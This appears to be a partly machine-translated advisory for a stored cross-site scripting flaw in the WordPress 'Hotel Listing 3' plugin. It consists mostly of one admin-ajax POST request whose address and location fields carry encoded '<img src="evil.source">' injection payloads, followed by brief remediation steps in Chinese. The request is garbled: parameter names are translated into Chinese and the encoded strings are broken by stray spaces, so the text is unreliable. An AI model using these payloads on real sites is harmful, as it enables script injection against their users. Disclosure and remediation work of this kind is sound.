WordPress Plugin Hotel Listing 3 - 'Multiple' 跨站脚本 (XSS)

http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php

action=iv_directories_save_listing&form_data=cpt_page=hotel&title=test1&new_post_content=test2&logo_image_id=&feature_image_id= 
&gallery_image_ids=&post_status=pending&postcats%5B%5D=&address=%22%3E%25220%3E%25220%3E%3C520%3E%3D =%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E& 
city=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22% 3E&邮政编码=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
状态=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22 %3E&country=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
纬度=&经度=&new_tag=&phone=&fax=&contact-email=&contact_web=&award_title%5B%5D=&award_description %5B%5D=&
Award_year%5B%5D=&menu_title%5B%5D=&menu_description%5B%5D=&menu_price%5B%5D=&menu_order%5B%5D=&room_title%5B%5D=&room_description%5B%5D=&room_price%5B%5D=& 
room_order %5B%5D=&override_bookingf=no&booking_stcode=&youtube=&vimeo=&facebook=&linkedin=&twitter=&gplus=&pinterest=&instagram=&Rooms=&suites=& 
Rating_stars=&CHECK_IN=&CHECK_out=&Cancellation=&Pets=&Children_nameds=Monday+B&B &day_value1%5B%5D=& 
day_value2%5B%5D=&event-title=&event-detail=++&event_image_id=&user_post_id=&_wpnonce=50241bc992 


解决方案 - 修复和补丁：
======================== 
1. 编码并解析所有易受攻击的输入字段在通过 post 方法请求传输时
2. 限制输入字段以禁止使用特殊字符
3. 在编辑和列表中对输出内容进行编码和转义以防止执行点